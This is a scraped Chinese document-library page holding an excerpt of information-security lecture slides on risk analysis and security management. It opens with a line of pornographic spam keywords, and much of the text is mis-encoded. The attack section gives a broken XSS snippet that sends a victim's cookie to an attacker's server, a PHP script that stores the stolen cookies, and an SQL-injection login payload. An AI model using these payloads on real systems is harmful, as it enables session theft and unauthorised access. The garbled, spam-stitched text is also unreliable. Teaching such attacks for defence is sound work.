freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內容

信息安全風險及分析(編輯修改稿)

2025-02-05 20:31 本頁面
 

【文章內容簡介】 針對網(wǎng)站的攻擊 XSS 跨站腳本 構建了個 Javascript 腳本傳遞客戶端的 cookie 到黑客的服務器 Javascript 腳本可以簡單的這樣寫 var img = new Image()。 = ‘?var=’ + encodeURI()。 然后服務器端使用 PHP 簡單寫了個腳本保存 Cookie 數(shù)據(jù) ?php if (isset($_GET[‘var’])) { file_put_contents(‘./cookie/’.time().‘.txt’, urldecode($_GET[‘var’]))。 } ? 構造 SQL登陸語句 用戶名 : admin 密碼 : 1’ or ‘1’=‘1 其他例子 ? 擊鍵記錄 ? Office文檔掛栽木馬 ? 網(wǎng)頁木馬 ? 木馬捆綁 信息安全管理概述 ? 例一: ?局域網(wǎng)內病毒泛濫成災。 ? 例二: ?網(wǎng)絡中為什么會有 ARP欺騙的問題發(fā)生 ? 例三: ?局域網(wǎng)內計算機故障頻繁發(fā)生 ? 例四: ?為什么要給每個用戶管理員權限 先來分析兩個例子 ? 信息安全的成敗取決于兩個因素:技術和管理。 ? 技術是信息安全的構筑材料,管理是真正的粘合劑和催化劑。 ? 人們常說, 三分技術,七分管理 ,可見管理對信息安全的重要性。 ? 信息安全管理( Information Security Management)作為組織完整的管理體系中一個重要的環(huán)節(jié),它構成了信息安全具有能動性的部分,是指導和控制組織的關于信息安全風險的相互協(xié)調的活動,其針對對象就是組織的信息資產(chǎn)。 ? 現(xiàn)實世界里大多數(shù)安全事件的發(fā)生和安全隱患的存在,與其說是技術上的原因,不如說是管理不善造成的,理解并重視管理對于信息安全的關鍵作用,對于真正實現(xiàn)信息安全目標來說尤其重要。 什么是信息安全管理? 根據(jù)風險評估結果、法律法規(guī)要求、組織業(yè)務運作自身需要來確定控制目標與控制措施。 實施所選的安全控制措施。 針對檢查結果采取應對措施,改進安全狀況。 依據(jù)策略、程序、標準和法律法規(guī),對安全措施的實施情況進行符合性檢查。 信息安全管理模型 ? 信息安全必須從整體考慮,必須做到“有計劃有目標、發(fā)現(xiàn)問題、分析問題、采取措施解決問題、后續(xù)監(jiān)督避免再現(xiàn)”這樣全程管理的思路,這就要求建立的是一套完整的信息安全管理體系,這樣的系統(tǒng)工程,只有處于組織最高管理者領導和支持之下,才可能成功 ? 最高管理層通過明確信息安全目標和方針為信息安全活動指引方向 ? 最高管理層能夠為信息安全活動提供必要的資源支持 ? 最高管理層能夠在重大問題上做出決策 ? 最高管理層可以協(xié)調組織不同單位不同環(huán)節(jié)的關系,提升促動力 ? 說到底,最高管理者是組織信息安全的最終責任人 組織高管全面負責信息安全管理 ? 制定有效的安全管理計劃,可以確保信息安全策略得到恰當執(zhí)行 ? 進行有效安全管理的途徑,應該是自上而下的( TopDown): ? 最高管理層負責啟動并定義組織的安全方針 ? 管理中層負責將安全策略充實成標準、基線、指南和程序,并監(jiān)督執(zhí)行 ? 業(yè)務經(jīng)理或安全專家負責實施安全管理文件中的指定配置 ? 最終用戶負責遵守組織所有的安全策略 ? 安全管理計劃小組應該開發(fā)三類計劃: ? 戰(zhàn)略計劃( strategic plan) 是長期計劃(例如 5年),相對穩(wěn)定,定義了組織的目標和使命 ? 戰(zhàn)術計劃( tactical plan) 是中期計劃(例如 1年),是對實現(xiàn)戰(zhàn)略計劃中既定目標的任務和進度的細節(jié)描述,例如雇用計劃、預算計劃、維護計劃、系統(tǒng)開發(fā)計劃等 ? 操作計劃( operational plan) 是短期的高度細化的計劃,須經(jīng)常更新(每月或每季度),例如培訓計劃、系統(tǒng)部署計劃、產(chǎn)品設計計劃等 按計劃行事 ? 數(shù)據(jù)收集者( Data Collector)對數(shù)據(jù)主體( Data Subject):準確( Accuracy)、隱私( Privacy); ? 數(shù)據(jù)保管者( Data Custodian)對數(shù)據(jù)擁有者( Data Owner):可用性( Availability)、完整性( Integrity)、保密性( Confidentiality); ? 數(shù)據(jù)用戶( Data Users)對擁有者 /主體( Owner/Subject):保密性( Confidentiality)和完整性; ? 系統(tǒng)用戶( System Users)對系統(tǒng)擁有者( System Owner):可用性( Availability)和軟件完整性( Software Integrity); ? 系統(tǒng)管理者( System Manager)對用戶( Users),可用性( Integrity)、完整
點擊復制文檔內容
試題試卷相關推薦
文庫吧 www.dybbs8.com
備案圖片鄂ICP備17016276號-1